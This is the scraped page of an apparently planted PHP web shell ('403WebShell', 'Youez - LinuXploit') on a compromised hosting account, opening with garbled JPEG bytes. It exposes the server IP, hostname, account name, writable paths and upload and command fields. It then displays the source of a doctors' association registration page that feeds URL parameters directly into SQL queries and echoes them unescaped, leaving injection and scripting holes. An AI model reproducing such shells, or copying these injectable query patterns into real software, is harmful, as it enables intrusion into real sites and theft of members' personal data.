JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.208  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/registrasi_inputmt.php
<?php include "header2.php";?>



<?php

// memulai session



 //jika session belum dibuat, maka inisialisasi awal diberi nilai TRUE

 

if (!isset($_SESSION['submit'])) {

$_SESSION['submit'] = true;

}

?><head>

 <link rel="icon" href="idilogo.png">





<style type="text/css">

<!--

-->



@import url(http://fonts.googleapis.com/css?family=Montserrat:400,700);



html{   



  background-size: cover;

  height:100%;

  	font-size: 12px;

}



#feedback-page{

	text-align:center;

}



#form-main{

	width:100%;

	float:left;

	padding-top:0px;

	

}







#form-div {

	background-image: linear-gradient(to right, #4682B4, #00FFFF, #00FA9A);

	background:url() no-repeat;

	padding-left:5px;

	padding-right:5px;

	padding-top:5px;

	padding-bottom:5px;

	 width: 900px;

	float: left;

    margin-top:5px;

	margin-left: 100px;

    -moz-border-radius: 7px;

   -webkit-border-radius: 7px;

}







.feedback-input {

	color:#3c3c3c;

	font-family: Helvetica, Arial, sans-serif;

  font-weight:500;

	font-size: 18px;

	border-radius: 0;

	line-height: 22px;

	background-color: #fbfbfb;

	padding: 13px 13px 13px 54px;

	margin-bottom: 10px;

	width:100%;

	-webkit-box-sizing: border-box;

	-moz-box-sizing: border-box;

	-ms-box-sizing: border-box;

	box-sizing: border-box;

  border: 3px solid rgba(0,0,0,0);

}



.feedback-input:focus{

	background: #fff;

	box-shadow: 0;

	border: 3px solid #3498db;

	color: #3498db;

	outline: none;

  padding: 13px 13px 13px 54px;

}



.focused{

	color:#30aed6;

	border:#30aed6 solid 3px;

}



/* Icons ---------------------------------- */

#name{

	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);

	background-size: 30px 30px;

	background-position: 11px 8px;

	background-repeat: no-repeat;

}



#name:focus{

	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);

	background-size: 30px 30px;

	background-position: 8px 5px;

  background-position: 11px 8px;

	background-repeat: no-repeat;

}



#email{

	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);

	background-size: 30px 30px;

	background-position: 11px 8px;

	background-repeat: no-repeat;

}



#email:focus{

	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);

	background-size: 30px 30px;

  background-position: 11px 8px;

	background-repeat: no-repeat;

}



#comment{

	background-image: url(http://rexkirby.com/kirbyandson/images/comment.svg);

	background-size: 30px 30px;

	background-position: 11px 8px;

	background-repeat: no-repeat;

}



.textarea {

    width: 100%;

    height: 80px;

    line-height: 150%;

    resize:vertical;

	padding: 10px;

}



.input:hover, textarea:hover,

input:focus, textarea:focus {

	background-color:white;

}



#button-blue{

	font-family: 'Montserrat', Arial, Helvetica, sans-serif;

	float:left;

	width: 100%;

	border: #fbfbfb solid 4px;

	cursor:pointer;

	background-color: #3498db;

	color:white;

	font-size:24px;

	padding-top:22px;

	padding-bottom:22px;

	-webkit-transition: all 0.3s;

	-moz-transition: all 0.3s;

	transition: all 0.3s;

  margin-top:-4px;

  font-weight:700;

}



#button-blue:hover{

	background-color: rgba(0,0,0,0);

	color: #0493bd;

}

	

.submit:hover {

	color: #3498db;

}

	

.ease {

	width: 0px;

	height: 74px;

	background-color: #fbfbfb;

	-webkit-transition: .3s ease;

	-moz-transition: .3s ease;

	-o-transition: .3s ease;

	-ms-transition: .3s ease;

	transition: .3s ease;

}



.submit:hover .ease{

  width:100%;

  background-color:white;

}



@media only screen and (max-width: 580px) {

	#form-div{

		left: 3%;

		margin-right: 3%;

		width: 88%;

		margin-left: 3%;

		padding-left: 3%;

		padding-right: 3%;

	}

</style>



<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">

		<script src="https://code.jquery.com/jquery-1.12.4.js"></script>

		<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>

	 	<script>

<!--

$( function() {

	    		$( "#datepicker1" ).datepicker({ dateFormat: 'dd-mm-yy' });

	    		$( "#datepicker2" ).datepicker({ dateFormat: 'dd-mm-yy' });

				$( "#datepicker3" ).datepicker({ dateFormat: 'dd-mm-yy' });

				$( "#datepicker4" ).datepicker({ dateFormat: 'dd-mm-yy' });

				$( "#datepicker5" ).datepicker({ dateFormat: 'dd-mm-yy' });

	  		} );



function MM_findObj(n, d) { //v4.01

  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {

    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}

  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];

  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);

  if(!x && d.getElementById) x=d.getElementById(n); return x;

}

//-->

</script> 

</head>

 

 <title>Ikatan Dokter Indonesia</title>



<body>

 

 <div id="wrapper">

  	<?php // include "sidebar.php"; ?>

    

    <!-- Content Wrapper -->

    <div id="content-wrapper" class="d-flex flex-column">



      <!-- Main Content -->

      <div id="content">

      

      <?php //include "topbar.php";?>

  

      	<!-- Begin Page Content -->

        <div class="container-fluid">

          <!-- DataTales Example -->

          <div class="card shadow mb-4">

            <div class="card-header py-3">

              <h6 class="m-0 font-weight-bold text-primary">List Post</h6>

            </div>

            <div class="card-body">

              <div class="table-responsive">







<div id="form-div">

								<CENTER><strong class="h2"> REGISTRASI</strong></CENTER>

								<p><label for=""></label> </p> 

								<br>

							  



			<?php

			$tglBayar 	= date('Y-m-d');

			$hari = date('Y-m-d');

            $npm  = $_GET['npm'];

			//$nmlead  = $_GET['nmlead'];

			

		    $data = mysqli_query($konek, "SELECT * FROM h_anggota WHERE npm='$_GET[npm]' " );

			      $d=mysqli_fetch_array($data);

				  

       $view = isset($d['npm']) ? $d['npm'] : null;



 

							?>

					

 <?php

    //menampilkan data Pra registrasi

      $npm=$_GET['npm'];

      $sql=mysqli_query($konek,"SELECT * FROM peserta where npm='$npm' AND validasi='proses'  order by id desc limit 1 ");

      $data=mysqli_fetch_array($sql);

      //data hobi dari tabel siswa 

     // $datahobi=explode(',', $data['dokumen']);

		   $rs = isset($data['rs']) ? $data['rs'] : null;

			$klinik = isset($data['klinik']) ? $data['klinik'] : null;

		    $puskesmas = isset($data['puskesmas']) ? $data['puskesmas'] : null;

			$pribadi = isset($data['pribadi']) ? $data['pribadi'] : null;

			$kota = isset($data['kota']) ? $data['kota'] : null;

			

 			// $npm = $data['npm'] ;



			 $perihal = $data['perihal'];

			 $anggota = $data['anggota'];

			 $ahli = $data['ahli'];

			 $status = $data['status'];		

				

      

       

    ?>

 <div class="tengah">

  <title>Persiapan Dokumen Rekomendasi </title>



  <br>

	<div class="card-body">

                  <div class="row">

                  <div class="col-md-6">

                  <div class="form-group ">  



	 <strong>Status Keanggotaan IDI Bandung:</strong><br>

	<input type="radio" name="anggota" value="anggota_IDI"<?php if($anggota=='anggota_IDI') echo 'checked'?> disabled> Anggota IDI Bandung 



	<br>

<strong>Status Kota :</strong><br>  

    <input type="radio" name="kota" value="bandung"<?php if($kota=='bandung') echo 'checked' ?> disabled>  Kota Bandung<br>        

	<input type="radio" name="kota" value="luar_kota"<?php if ("luar_kota"==$kota) echo "checked";?> disabled>  Luar Kota Bandung<br>

	

	 

   <br>     

	<strong>Keahlian : </strong><br>

	<input type="radio" name="ahli" value="dokter_umum"<?php if($ahli=='dokter_umum') echo 'checked'?> disabled> Dokter Umum <br>  

	<input type="radio" name="ahli" value="spesialis"<?php if($ahli=='spesialis') echo 'checked' ?> disabled> Dokter Spesialis<br> 

	

<br>



<strong>Status Pengajuan :</strong><br>

	<input type="radio" name="status" value="rekom_baru"<?php if($status=='rekom_baru') echo 'checked'?> disabled> Pengajuan Baru <br> 

	<input type="radio" name="status" value="rekom_tambah_praktek"<?php if($status=='rekom_tambah_praktek') echo 'checked'?> disabled> Penambahan Tempat  Praktek <br> 	 

	<input type="radio" name="status" value="rekom_revisi_praktek"<?php if($status=='rekom_revisi_praktek') echo 'checked'?> disabled> Revisi Tempat Praktek 

	   

 </div>

  </div>

                 

 <div class="col-md-6"> 

					  

					  

<strong>Jenis Pengajuan rekomendasi:</strong><br>

	<input type="radio" name="perihal" value="rekomendasi_SIP_dr_umum"<?php if($perihal=='rekomendasi_SIP_dr_umum') echo 'checked'?> disabled> Rekomendasi SIP dr Umum  <br> 

    

		  <input type="radio" name="perihal" value="rekomendasi_SIP_dr_spesialis"<?php if($perihal=='rekomendasi_SIP_dr_spesialis') echo 'checked'?> disabled> Rekomendasi SIP dr Spesialis  <br>  

	  

		  <input type="radio" name="perihal" value="rekomendasi_PPDS"<?php if($perihal=='rekomendasi_PPDS') echo 'checked'?> disabled> Rekomendasi PPDS  <br>

	  

		  <input type="radio" name="perihal" value="rekomendasi_SIP_PPDS"<?php if($perihal=='rekomendasi_SIP_PPDS') echo 'checked'?> disabled> Rekomendasi SIP PPDS <br>  

	  

		  <input type="radio" name="perihal" value="rekomendasi_SIP_PPDS_II"<?php if($perihal=='rekomendasi_SIP_PPDS_II') echo 'checked'?> disabled> Rekomendasi SIP PPDS II <br> 

		  

		  <input type="radio" name="perihal" value="rekomendasi_internsip"<?php if($perihal=='rekomendasi_internsip') echo 'checked'?> disabled> Rekomendasi Internsip<br> 	



			<input type="radio" name="perihal" value="mutasi"<?php if($perihal=='mutasi') echo 'checked'?> disabled> Rekomendasi Mutasi <br>  

		  

		  <input type="radio" name="perihal" value="kehilangan"<?php if($perihal=='kehilangan') echo 'checked'?> disabled> Rekomendasi Kehilangan<br> 

		 

	 	<br>     

			  

	  <strong>Tempat Sarana Kesehatan :</strong><br>

	  

    

	  <input type="checkbox" name="rs" value="rumah_sakit"  <?php if ("rumah_sakit"==$rs) echo "checked";?> disabled> Rumah Sakit</label><br>

	

	   <input type="checkbox" name="klinik" value="klinik"<?php if ("klinik"==$klinik) echo "checked";?> disabled>  Klinik</label><br>

	

		<input type="checkbox" name="puskesmas" value="puskesmas"<?php if ("puskesmas"==$puskesmas) echo "checked";?> disabled>  Puskesmas</label><br>

	

<input type="checkbox" name="pribadi" value="pribadi"<?php if ("pribadi"==$pribadi) echo "checked";?> disabled> Pribadi</label><br>	

	 <br>

	 

</div>	

  

  



<center></center><title><h4>INPUT DATA PRIBADI</h4> </title>



  						<?php

                        if($d['gambar'] <> ''){

                        ?>

                               

                 		

	<img  src="../file/<?php echo $d['gambar']; ?>"  class="MagicZoom" rel="zoom-id:zoom;opacity-reverse:true;" width="120" height="120"/>	

                                    

                                        <?php

                            		    }

                        				?>

	<form method="post" action="reg_prosmt.php" enctype="multipart/form-data">

                    

    <div class="card-body">

    <center> <p><b>Input Data Form Registrasi</b></p></center>

    <div class="row">

    <div class="col-md-4">        

		<input name="noreg" readonly class="form-control"  value="<?php echo $_GET['noreg']  ?>"  />

		</p>

		<input name="npm" readonly type="hidden" class="form-control"  value="<?php echo $_GET['npm']  ?>"  />



		<label for="ket">Tanggal Registrasi </label>

		<input name="tglreg" class="form-control" readonly type="text"  value="<?php echo $hari ?>" size="11" />

					  </p> 

		<label for="nama">NPA</label>

					<br>

		<p class="name"><input name="npa" placeholder="Isi NPA" class="form-control" readonly  value="<?php echo $d['npa']  ?>" maxlength="5" required />

					 </p> 

		</p>Nomor STR <br>

		<input name="nostr" type="text" class="form-control" readonly    placeholder="Isi Nomor STR" maxlength="30" value="<?php echo $d['nostr']  ?>" required />

            		  </p>	

        <label for="tbayar">NO KTP :</label>

 	<br>

     

        <input class="form-control" readonly  name="ktp" type="teks"   placeholder="Isi Nomor KTP"  value="<?php echo $d['ktp']  ?>" required />



       </p>                   

                      

                      

                      		  

		<label for="tbayar">Nama Lengkap dan gelar</label>

					<br>

        <textarea name="nmlead" class="form-control" readonly  placeholder="Isi Nama lengkap (Gelar)" required><?php echo $d['nmlead']  ?></textarea>

					  </p>	

         <label for="Keahlian">Keahlian/Spesialis </label>

								<br>

		<textarea name="ahli" class="form-control" readonly  placeholder="Isi Keahlian Praktek sebagai" required><?php echo $d['ahli']  ?></textarea>

				

  </div>                 

 <div class="col-md-4">	

 

         

 

            <div class="form-group"> 	 

    		<label for="Alamat">Alamat</label>

							  <br>

								

		<textarea name="alamat" class="form-control" readonly  placeholder="Isi Alamat" required><?php echo $d['alamat']  ?></textarea>

						

                            

                              </p>

		 <label for="telp ">Mobile no/WA contoh :628xxx</label>						                	

   <br>                 

          <input name="telp" type="number" class="form-control" readonly value="<?php echo $d['telp']  ?>"  placeholder="Isi telp 628xxx" maxlength="30" required />

							  </p> 

             <label for="No Telpon">Alamat Email</label>	                 

          <br>                 

          <input name="email" type="email" class="form-control" readonly value="<?php echo $d['email']  ?>"  placeholder="Isi email" maxlength="30" required />

							  </p>                     

                              

				              

   		           

               <label for="mbstr" ><b>Masa Berlaku Akhir Nomor STR</b> </label> 

                   <br> 

               <input class="form-control" readonly  name="mbstr" id="datepicker4" placeholder="Format Tanggal Bulan Tahun" value="<?php echo $d['mbstr']  ?>" size="11" required>

                    

                    </p>		

     <label for="jumlah" ><b>Exp Tgl Iuran 5 Tahunan</b> </label>

					  <br>

					   <input name="iuran" class="form-control" readonly  type="date" value="<?php echo $d['tgliuran']  ?>" size="11" required /></p>		                			  

  </div>

      </div>             

 <div class="col-md-4">	

              



			  

					 				

					

						

<br>

						 <?php 

					//	if($d['tgliuran'] < $hari){

							

					//	}else{

					?>

 <label for="supervisor">Biaya Administrasi: </label><br>

			

					

					<?php

					$sqlKelas = mysqli_query($konek, "select * from level where kat_nm= '$perihal' order by level ASC");

					$k=mysqli_fetch_array($sqlKelas);

				

			//	$kat_nm = isset($d['kat_nm']) ? $d['kat_nm'] : null;

			//	$nominal = isset($d['nominal']) ? $d['nominal'] : null;

					$kat_nm = $k['kat_nm'];

				    $nominal = $k['nominal'] ;

				

				?>

				<input name="level" type="text" class="form-control"   readonly  value="<?php echo $kat_nm ?>" />    

			 </P>

              <label for="awalmbstr" ><b>Nominal IDR :</b> </label> 

                               <br>

               <input name="katnominal" type="text" class="form-control"  readonly  maxlength="30"  value="<?php echo $nominal ?>" />

                                             

                            </P> 

<label for="No Telpon">Kota tujuan Mutasi</label>	                 

          <br>                 

          <input name="kotamt" type="text" class="form-control"  value=""  placeholder="Isi Kota Tujuan Mutasi" maxlength="100" required />

							  </p>		     

<label for="Alamat">Alamat Tujuan Mutasi :</label>

							  <br>

								

		<textarea name="alamatmt" class="form-control"   placeholder="Isi Alamat Tujuan Mutasi" required></textarea>

			 </P> 		

					  <div class="submit">

						<input type="submit"   id="button-blue" value="Submit" />

					<div class="ease"></div>

					  </div>

                      

                      	<?php 

				//					}

						 ?>	

                      <!-- <div class="submit">

						<input type="submit"   id="button-blue" value="Submit" />

						<div class="ease"></div>

					  </div>-->

					</form>

  </div>	

	

				

			</div>

  </div>

  </div>

  

   </div> 

   

   

   <br> <br> 

    <!-- jQuery first, then Popper.js, then Bootstrap JS -->

  



   </body>





<!-- proses edit data -->






Youez - 2016 - github.com/yon3zu
LinuXploit